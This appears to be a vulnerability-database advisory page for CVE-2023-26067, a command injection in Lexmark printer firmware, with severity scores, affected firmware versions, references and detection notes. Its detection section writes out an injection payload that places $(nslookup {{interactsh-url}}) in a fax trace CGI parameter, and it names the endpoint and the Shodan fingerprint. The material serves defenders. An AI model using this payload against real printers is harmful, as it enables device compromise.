CVE-2023-26067
published 2023-04-10CVE-2023-26067: Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).
PriorityP183high8.1CVSS 3.1
AVNACHPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
37.84%
98.4th percentile
Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).
Affected
28 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lexmark | cslbl_firmware | < cslbl.081.232 | cslbl.081.232 |
| lexmark | cslbn_firmware | < cslbn.081.232 | cslbn.081.232 |
| lexmark | csnzj_firmware | < csnzj.081.232 | csnzj.081.232 |
| lexmark | cstat_firmware | < cstat.081.233 | cstat.081.233 |
| lexmark | cstmh_firmware | < cstmh.081.233 | cstmh.081.233 |
| lexmark | cstmh_firmware | < cstmx.081.233 | cstmx.081.233 |
| lexmark | cstpc_firmware | < cstpc.081.232 | cstpc.081.232 |
| lexmark | cxlbl_firmware | < cxlbl.081.232 | cxlbl.081.232 |
| lexmark | cxlbn_firmware | < cxlbn.081.232 | cxlbn.081.232 |
| lexmark | cxnzj_firmware | < cxnzj.081.232 | cxnzj.081.232 |
| lexmark | cxtat_firmware | < cxtat.081.233 | cxtat.081.233 |
| lexmark | cxtmm_firmware | < cxtmm.081.232 | cxtmm.081.232 |
| lexmark | cxtpc_firmware | < cxtpc.081.232 | cxtpc.081.232 |
| lexmark | cxtpp_firmware | < cxtpp.081.233 | cxtpp.081.233 |
| lexmark | cxtpp_firmware | < cstpp.081.233 | cstpp.081.233 |
| lexmark | cxtzj_firmware | < cxtzj.081.232 | cxtzj.081.232 |
| lexmark | mslbd_firmware | < mslbd.081.232 | mslbd.081.232 |
| lexmark | mslsg_firmware | < mslsg.081.232 | mslsg.081.232 |
| lexmark | msngm_firmware | < msngm.081.232 | msngm.081.232 |
| lexmark | msngw_firmware | < msngw.081.232 | msngw.081.232 |
| lexmark | mstgw_firmware | < mstgw.081.232 | mstgw.081.232 |
| lexmark | mxlbd_firmware | < mxlbd.081.232 | mxlbd.081.232 |
| lexmark | mxlsg_firmware | < mxlsg.081.232 | mxlsg.081.232 |
| lexmark | mxngm_firmware | < mxngm.081.232 | mxngm.081.232 |
| lexmark | mxtct_firmware | < mxtct.081.232 | mxtct.081.232 |
Detection & IOCsextracted from sources · hover to see the quote
url/cgi-bin/fax_change_faxtrace_settings
commandFT_Custom_lbtrace=$(nslookup {{interactsh-url}})
otherServer: Lexmark_Web_Server
otherserver: lexmark_web_server
- →Exploit targets HTTP POST to /cgi-bin/fax_change_faxtrace_settings with a command injection payload in the FT_Custom_lbtrace parameter using shell command substitution syntax $(...)
- →Successful exploitation can be confirmed via out-of-band DNS interaction (interactsh/OOB DNS callback) triggered by the injected nslookup command
- →Vulnerable Lexmark devices can be fingerprinted on Shodan using the HTTP Server header 'Lexmark_Web_Server' or 'lexmark_web_server'
- →A successful response to the exploit endpoint returns HTTP 200 and a body containing the string 'Fax Trace Settings'
- →The injection variable used in the payload is cmd set to 'nslookup {{interactsh-url}}', confirming the attack vector is OS command injection via shell substitution in the FAX trace settings CGI handler
- ·The vulnerability is rated CVSS 8.1 (High) but with High Attack Complexity (AC:H), meaning exploitation may require specific conditions or timing to succeed ↗
- ·The CVE affects a broad range of Lexmark devices; the CPE wildcard (*) indicates multiple firmware versions are impacted up through 2023-02-19
- ·This is issue 1 of 4 input validation mishandling CVEs for Lexmark devices; additional related CVEs exist and should be assessed together ↗
CVSS provenance
nvdv3.18.1HIGHCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck8.1HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-v2qx-4m4h-cjmg: Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4)
ghsa_unreviewed·2023-04-10
CVE-2023-26067 [HIGH] CWE-20 GHSA-v2qx-4m4h-cjmg: Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4)
Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).
VulnCheck
lexmark cxtpc_firmware Improper Input Validation
vulncheck·2023·CVSS 8.1
CVE-2023-26067 [HIGH] lexmark cxtpc_firmware Improper Input Validation
lexmark cxtpc_firmware Improper Input Validation
Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).
Affected: lexmark cxtpc_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-04&host_type=src&vulnerability=cve-2023-26067; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-25&host_type=src&vulnerability=cve-2023-26067; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-13&host_type=src&vulnerability=cve-2023-26067; https://dashboard.shadowserver.org/statistics/ho
No detection rules found.
Nuclei
Lexmark Printers - Command Injection
nuclei·CVSS 8.1
CVE-2023-26067 [HIGH] Lexmark Printers - Command Injection
Lexmark Printers - Command Injection
Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).
Template:
id: CVE-2023-26067
info:
name: Lexmark Printers - Command Injection
author: DhiyaneshDK
severity: high
description: |
Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the affected device.
remediation: |
Apply the latest firmware update provided by Lexmark to mitigate the command injection vulnerability.
reference:
- https://www.horizon3.ai/lexmark-command-injection-vulnerability-zdi-can-19470-pwn2own-toronto-2022/
- https://github.com/horizon3ai/CVE-2023-26067
- https://nvd.nist.gov/vuln/
No writeups or analysis indexed.
http://packetstormsecurity.com/files/174763/Lexmark-Device-Embedded-Web-Server-Remote-Code-Execution.htmlhttps://publications.lexmark.com/publications/security-alerts/CVE-2023-26067.pdfhttps://support.lexmark.com/alerts/http://packetstormsecurity.com/files/174763/Lexmark-Device-Embedded-Web-Server-Remote-Code-Execution.htmlhttps://publications.lexmark.com/publications/security-alerts/CVE-2023-26067.pdfhttps://support.lexmark.com/alerts/
2023-04-10
Published
Exploited in the wild